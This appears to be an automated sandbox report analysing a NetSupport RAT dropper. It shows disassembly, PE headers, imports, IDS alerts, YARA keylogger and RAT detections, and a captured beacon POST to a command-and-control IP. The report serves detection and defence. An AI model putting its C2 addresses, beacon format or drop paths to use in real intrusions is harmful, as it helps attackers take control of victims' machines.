                                                                                dec eax
                                                                                mov ecx, esi
                                                                                dec ecx
                                                                                mov edi, ecx
                                                                                inc ecx
                                                                                mov ebx, dword ptr [edx]
                                                                                dec eax
                                                                                shl ebx, 04h
                                                                                dec ecx
                                                                                add ebx, edx
                                                                                dec esp
                                                                                lea eax, dword ptr [ebx+04h]
                                                                                call 00007F5E2CE19013h
                                                                                mov eax, dword ptr [ebp+04h]
                                                                                and al, 66h
                                                                                neg al
                                                                                mov eax, 00000001h
                                                                                sbb edx, edx
                                                                                neg edx
                                                                                add edx, eax
                                                                                test dword ptr [ebx+04h], edx
                                                                                je 00007F5E2CE19D23h
                                                                                dec esp
                                                                                mov ecx, edi
                                                                                dec ebp
                                                                                mov eax, esi
                                                                                dec eax
                                                                                mov edx, esi
                                                                                dec eax
                                                                                mov ecx, ebp
                                                                                call 00007F5E2CE1BD37h
                                                                                dec eax
                                                                                mov ebx, dword ptr [esp+30h]
                                                                                dec eax
                                                                                mov ebp, dword ptr [esp+38h]
                                                                                dec eax
                                                                                mov esi, dword ptr [esp+40h]
                                                                                dec eax
                                                                                mov edi, dword ptr [esp+48h]
                                                                                dec eax
                                                                                add esp, 20h
                                                                                inc ecx
                                                                                pop esi
                                                                                ret
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                dec eax
                                                                                sub esp, 48h
                                                                                dec eax
                                                                                lea ecx, dword ptr [esp+20h]
                                                                                call 00007F5E2CE085A3h
                                                                                dec eax
                                                                                lea edx, dword ptr [00025747h]
                                                                                dec eax
                                                                                lea ecx, dword ptr [esp+20h]
                                                                                call 00007F5E2CE1ADF2h
                                                                                int3
                                                                                jmp 00007F5E2CE20FD4h
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe360.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x700000xe3600xe400ada5628b9441c3d4f775b5c1be0267efFalse0.630139802631579data6.596650704309685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                PNG0x706800xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                PNG0x711c80x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                RT_ICON0x727780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                RT_ICON0x72ce00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                RT_ICON0x735880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                RT_ICON0x744300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                RT_ICON0x748980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                RT_ICON0x759400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                RT_ICON0x77ee80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                RT_DIALOG0x7c5b80x286dataEnglishUnited States0.5092879256965944
                                                                                RT_DIALOG0x7c3880x13adataEnglishUnited States0.60828025477707
                                                                                RT_DIALOG0x7c4c80xecdataEnglishUnited States0.6991525423728814
                                                                                RT_DIALOG0x7c2580x12edataEnglishUnited States0.5927152317880795
                                                                                RT_DIALOG0x7bf200x338dataEnglishUnited States0.45145631067961167
                                                                                RT_DIALOG0x7bcc80x252dataEnglishUnited States0.5757575757575758
                                                                                RT_STRING0x7cf980x1e2dataEnglishUnited States0.3900414937759336
                                                                                RT_STRING0x7d1800x1ccdataEnglishUnited States0.4282608695652174
                                                                                RT_STRING0x7d3500x1b8dataEnglishUnited States0.45681818181818185
                                                                                RT_STRING0x7d5080x146dataEnglishUnited States0.5153374233128835
                                                                                RT_STRING0x7d6500x46cdataEnglishUnited States0.3454063604240283
                                                                                RT_STRING0x7dac00x166dataEnglishUnited States0.49162011173184356
                                                                                RT_STRING0x7dc280x152dataEnglishUnited States0.5059171597633136
                                                                                RT_STRING0x7dd800x10adataEnglishUnited States0.49624060150375937
                                                                                RT_STRING0x7de900xbcdataEnglishUnited States0.6329787234042553
                                                                                RT_STRING0x7df500x1c0dataEnglishUnited States0.5178571428571429
                                                                                RT_STRING0x7e1100x250dataEnglishUnited States0.44256756756756754
                                                                                RT_GROUP_ICON0x7bc600x68dataEnglishUnited States0.7019230769230769
                                                                                RT_MANIFEST0x7c8400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                DLLImport
                                                                                KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-31T17:05:40.883894+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.549704172.86.117.97443TCP
                                                                                2024-10-31T17:06:03.056875+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549706TCP
                                                                                2024-10-31T17:06:41.336373+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549907TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 31, 2024 17:05:46.526397943 CET49704443192.168.2.5172.86.117.97
                                                                                Oct 31, 2024 17:05:46.526444912 CET44349704172.86.117.97192.168.2.5
                                                                                Oct 31, 2024 17:05:46.526532888 CET49704443192.168.2.5172.86.117.97
                                                                                Oct 31, 2024 17:05:46.597737074 CET49704443192.168.2.5172.86.117.97
                                                                                Oct 31, 2024 17:05:46.597759962 CET44349704172.86.117.97192.168.2.5
                                                                                Oct 31, 2024 17:05:46.597814083 CET44349704172.86.117.97192.168.2.5
                                                                                Oct 31, 2024 17:05:46.624857903 CET4970580192.168.2.5172.67.68.212
                                                                                Oct 31, 2024 17:05:46.630076885 CET8049705172.67.68.212192.168.2.5
                                                                                Oct 31, 2024 17:05:46.630145073 CET4970580192.168.2.5172.67.68.212
                                                                                Oct 31, 2024 17:05:46.630245924 CET4970580192.168.2.5172.67.68.212
                                                                                Oct 31, 2024 17:05:46.635592937 CET8049705172.67.68.212192.168.2.5
                                                                                Oct 31, 2024 17:05:48.270577908 CET8049705172.67.68.212192.168.2.5
                                                                                Oct 31, 2024 17:05:48.270632982 CET4970580192.168.2.5172.67.68.212
                                                                                Oct 31, 2024 17:07:36.601964951 CET4970580192.168.2.5172.67.68.212
                                                                                Oct 31, 2024 17:07:36.607688904 CET8049705172.67.68.212192.168.2.5
                                                                                Oct 31, 2024 17:07:36.613964081 CET4970580192.168.2.5172.67.68.212
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 31, 2024 17:05:46.608417034 CET5072153192.168.2.51.1.1.1
                                                                                Oct 31, 2024 17:05:46.620574951 CET53507211.1.1.1192.168.2.5
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 31, 2024 17:05:46.608417034 CET192.168.2.51.1.1.10x7fe7Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 31, 2024 17:05:46.620574951 CET1.1.1.1192.168.2.50x7fe7No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                Oct 31, 2024 17:05:46.620574951 CET1.1.1.1192.168.2.50x7fe7No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                Oct 31, 2024 17:05:46.620574951 CET1.1.1.1192.168.2.50x7fe7No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                • 172.86.117.97connection: keep-alivecmd=pollinfo=1ack=1
                                                                                • geo.netsupportsoftware.com
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549704172.86.117.974435732C:\Users\Public\Netstat\bild.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 31, 2024 17:05:46.597737074 CET218OUTPOST http://172.86.117.97/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 172.86.117.97Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                Data Raw:
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549705172.67.68.212805732C:\Users\Public\Netstat\bild.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 31, 2024 17:05:46.630245924 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                Host: geo.netsupportsoftware.com
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                Oct 31, 2024 17:05:48.270577908 CET959INHTTP/1.1 200 OK
                                                                                Date: Thu, 31 Oct 2024 16:05:48 GMT
                                                                                Content-Type: text/html; Charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                CF-Ray: 8db4e379cdb845e4-DFW
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Access-Control-Allow-Origin: *
                                                                                Cache-Control: private
                                                                                Set-Cookie: ASPSESSIONIDCCBQAACB=GLDPFJHBNMGEIBKMAEBBGABK; path=/
                                                                                cf-apo-via: origin,host
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-Powered-By: ASP.NET
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1RH1vq9tq2WPg00ev%2FK3Hp2AUvjG1iOIsDql1y2g24FCdyZmgD67xnsCxzEpToiptBIJY6vB6lz8SwZHtEplZ3NEDmcnR%2FQiQHZ3ADdEdo3xmYheBNdsMi84vQBMHoloO0EHKhUM4bRSNFR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1932&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: f32.7767,-96.7970


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:12:05:44
                                                                                Start date:31/10/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x7ff75aaa0000
                                                                                File size:2'283'549 bytes
                                                                                MD5 hash:87514BCFA421057DC1575EC1630D78FF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:12:05:45
                                                                                Start date:31/10/2024
                                                                                Path:C:\Users\Public\Netstat\bild.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                Imagebase:0x260000
                                                                                File size:105'848 bytes
                                                                                MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000003.2343699674.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000000.2041890788.0000000000262000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.3888424181.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 29%, ReversingLabs
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:11.8%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:27.4%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:26
                                                                                  execution_graph 25408 7ff75aad11cf 25409 7ff75aad1102 25408->25409 25409->25408 25411 7ff75aad1900 25409->25411 25437 7ff75aad1558 25411->25437 25414 7ff75aad198b 25415 7ff75aad1868 DloadReleaseSectionWriteAccess 6 API calls 25414->25415 25416 7ff75aad1998 RaiseException 25415->25416 25417 7ff75aad1bb5 25416->25417 25417->25409 25418 7ff75aad19b4 25419 7ff75aad1a3d LoadLibraryExA 25418->25419 25420 7ff75aad1b85 25418->25420 25422 7ff75aad1aa9 25418->25422 25425 7ff75aad1abd 25418->25425 25421 7ff75aad1a54 GetLastError 25419->25421 25419->25422 25445 7ff75aad1868 25420->25445 25426 7ff75aad1a7e 25421->25426 25427 7ff75aad1a69 25421->25427 25423 7ff75aad1ab4 FreeLibrary 25422->25423 25422->25425 25423->25425 25424 7ff75aad1b1b GetProcAddress 25424->25420 25430 7ff75aad1b30 GetLastError 25424->25430 25425->25420 25425->25424 25429 7ff75aad1868 DloadReleaseSectionWriteAccess 6 API calls 25426->25429 25427->25422 25427->25426 25431 7ff75aad1a8b RaiseException 25429->25431 25432 7ff75aad1b45 25430->25432 25431->25417 25432->25420 25433 7ff75aad1868 DloadReleaseSectionWriteAccess 6 API calls 25432->25433 25434 7ff75aad1b67 RaiseException 25433->25434 25435 7ff75aad1558 _com_raise_error 6 API calls 25434->25435 25436 7ff75aad1b81 25435->25436 25436->25420 25438 7ff75aad15d3 25437->25438 25439 7ff75aad156e 25437->25439 25438->25414 25438->25418 25453 7ff75aad1604 25439->25453 25442 7ff75aad15ce 25444 7ff75aad1604 DloadReleaseSectionWriteAccess 3 API calls 25442->25444 25444->25438 25446 7ff75aad1878 25445->25446 25452 7ff75aad18d1 25445->25452 25447 7ff75aad1604 DloadReleaseSectionWriteAccess 3 API calls 25446->25447 25448 7ff75aad187d 25447->25448 25449 7ff75aad18cc 25448->25449 25450 7ff75aad17d8 DloadProtectSection 3 API calls 25448->25450 25451 7ff75aad1604 DloadReleaseSectionWriteAccess 3 API calls 25449->25451 25450->25449 25451->25452 25452->25417 25454 7ff75aad1573 25453->25454 25455 7ff75aad161f 25453->25455 25454->25442 25460 7ff75aad17d8 25454->25460 25455->25454 25456 7ff75aad1624 GetModuleHandleW 25455->25456 25457 7ff75aad163e GetProcAddress 25456->25457 25458 7ff75aad1639 25456->25458 25457->25458 25459 7ff75aad1653 GetProcAddress 25457->25459 25458->25454 25459->25458 25462 7ff75aad17fa DloadProtectSection 25460->25462 25461 7ff75aad1802 25461->25442 25462->25461 25463 7ff75aad183a VirtualProtect 25462->25463 25465 7ff75aad16a4 VirtualQuery GetSystemInfo 25462->25465 25463->25461 25465->25463 25466 7ff75aad03e0 25467 7ff75aad041f 25466->25467 25468 7ff75aad0497 25466->25468 25499 7ff75aabaae0 25467->25499 25469 7ff75aabaae0 48 API calls 25468->25469 25472 7ff75aad04ab 25469->25472 25474 7ff75aabda98 48 API calls 25472->25474 25478 7ff75aad0442 memcpy_s 25474->25478 25476 7ff75aad0541 25496 7ff75aaa250c 25476->25496 25477 7ff75aad05cc 25481 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25477->25481 25478->25477 25490 7ff75aad05c6 25478->25490 25491 7ff75aaa1fa0 25478->25491 25483 7ff75aad05d2 25481->25483 25509 7ff75aad7904 25490->25509 25492 7ff75aaa1fb3 25491->25492 25493 7ff75aaa1fdc 25491->25493 25492->25493 25494 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25492->25494 25493->25476 25495 7ff75aaa2000 25494->25495 25497 7ff75aaa2513 25496->25497 25498 7ff75aaa2516 SetDlgItemTextW 25496->25498 25497->25498 25500 7ff75aabaaf3 25499->25500 25514 7ff75aab9774 25500->25514 25503 7ff75aabab86 25506 7ff75aabda98 25503->25506 25504 7ff75aabab58 LoadStringW 25504->25503 25505 7ff75aabab71 LoadStringW 25504->25505 25505->25503 25551 7ff75aabd874 25506->25551 25644 7ff75aad783c 31 API calls 2 library calls 25509->25644 25511 7ff75aad791d 25645 7ff75aad7934 16 API calls abort 25511->25645 25521 7ff75aab9638 25514->25521 25517 7ff75aab97d9 25531 7ff75aad2320 25517->25531 25522 7ff75aab9692 25521->25522 25530 7ff75aab9730 25521->25530 25526 7ff75aab96c0 25522->25526 25544 7ff75aac0f68 WideCharToMultiByte 25522->25544 25524 7ff75aad2320 _handle_error 8 API calls 25525 7ff75aab9764 25524->25525 25525->25517 25540 7ff75aab9800 25525->25540 25529 7ff75aab96ef 25526->25529 25546 7ff75aabaa88 45 API calls _snwprintf 25526->25546 25547 7ff75aada270 31 API calls 2 library calls 25529->25547 25530->25524 25532 7ff75aad2329 25531->25532 25533 7ff75aab97f2 25532->25533 25534 7ff75aad2550 IsProcessorFeaturePresent 25532->25534 25533->25503 25533->25504 25535 7ff75aad2568 25534->25535 25548 7ff75aad2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25535->25548 25537 7ff75aad257b 25549 7ff75aad2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25537->25549 25541 7ff75aab9840 25540->25541 25543 7ff75aab9869 25540->25543 25550 7ff75aada270 31 API calls 2 library calls 25541->25550 25543->25517 25545 7ff75aac0faa 25544->25545 25545->25526 25546->25529 25547->25530 25548->25537 25550->25543 25567 7ff75aabd4d0 25551->25567 25555 7ff75aabd8e5 _snwprintf 25563 7ff75aabd974 25555->25563 25581 7ff75aad9ef0 25555->25581 25608 7ff75aaa9d78 33 API calls 25555->25608 25557 7ff75aabd9a3 25559 7ff75aabda17 25557->25559 25562 7ff75aabda3f 25557->25562 25560 7ff75aad2320 _handle_error 8 API calls 25559->25560 25561 7ff75aabda2b 25560->25561 25561->25478 25564 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25562->25564 25563->25557 25609 7ff75aaa9d78 33 API calls 25563->25609 25565 7ff75aabda44 25564->25565 25568 7ff75aabd665 25567->25568 25570 7ff75aabd502 25567->25570 25571 7ff75aabcb80 25568->25571 25569 7ff75aaa1744 33 API calls 25569->25570 25570->25568 25570->25569 25572 7ff75aabcbb6 25571->25572 25578 7ff75aabcc80 25571->25578 25575 7ff75aabcc20 25572->25575 25576 7ff75aabcc7b 25572->25576 25580 7ff75aabcbc6 25572->25580 25575->25580 25610 7ff75aad21d0 25575->25610 25619 7ff75aaa1f80 33 API calls 3 library calls 25576->25619 25620 7ff75aaa2004 33 API calls std::_Xinvalid_argument 25578->25620 25580->25555 25582 7ff75aad9f36 25581->25582 25583 7ff75aad9f4e 25581->25583 25632 7ff75aadd69c 15 API calls _invalid_parameter_noinfo 25582->25632 25583->25582 25585 7ff75aad9f58 25583->25585 25634 7ff75aad7ef0 35 API calls 2 library calls 25585->25634 25586 7ff75aad9f3b 25633 7ff75aad78e4 31 API calls _invalid_parameter_noinfo 25586->25633 25589 7ff75aad9f69 __scrt_get_show_window_mode 25635 7ff75aad7e70 15 API calls _set_fmode 25589->25635 25590 7ff75aad2320 _handle_error 8 API calls 25591 7ff75aada10b 25590->25591 25591->25555 25593 7ff75aad9fd4 25636 7ff75aad82f8 46 API calls 3 library calls 25593->25636 25595 7ff75aad9fdd 25596 7ff75aada014 25595->25596 25597 7ff75aad9fe5 25595->25597 25599 7ff75aada023 25596->25599 25600 7ff75aada092 25596->25600 25602 7ff75aada01a 25596->25602 25606 7ff75aada06c 25596->25606 25637 7ff75aadd90c 25597->25637 25601 7ff75aadd90c __free_lconv_mon 15 API calls 25599->25601 25604 7ff75aada09c 25600->25604 25600->25606 25607 7ff75aad9f46 25601->25607 25602->25599 25602->25606 25603 7ff75aadd90c __free_lconv_mon 15 API calls 25603->25607 25605 7ff75aadd90c __free_lconv_mon 15 API calls 25604->25605 25605->25607 25606->25603 25607->25590 25608->25555 25609->25557 25611 7ff75aad21db 25610->25611 25612 7ff75aad21f4 25611->25612 25614 7ff75aad21fa 25611->25614 25621 7ff75aadbbc0 25611->25621 25612->25580 25615 7ff75aad2205 25614->25615 25624 7ff75aad2f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25614->25624 25625 7ff75aaa1f80 33 API calls 3 library calls 25615->25625 25618 7ff75aad220b 25619->25578 25626 7ff75aadbc00 25621->25626 25624->25615 25625->25618 25631 7ff75aadf398 EnterCriticalSection 25626->25631 25632->25586 25633->25607 25634->25589 25635->25593 25636->25595 25638 7ff75aadd911 RtlFreeHeap 25637->25638 25642 7ff75aadd941 __free_lconv_mon 25637->25642 25639 7ff75aadd92c 25638->25639 25638->25642 25643 7ff75aadd69c 15 API calls _invalid_parameter_noinfo 25639->25643 25641 7ff75aadd931 GetLastError 25641->25642 25642->25607 25643->25641 25644->25511 25646 7ff75aacb190 25989 7ff75aaa255c 25646->25989 25648 7ff75aacb1db 25649 7ff75aacbe93 25648->25649 25650 7ff75aacb1ef 25648->25650 25699 7ff75aacb20c 25648->25699 26259 7ff75aacf390 25649->26259 25652 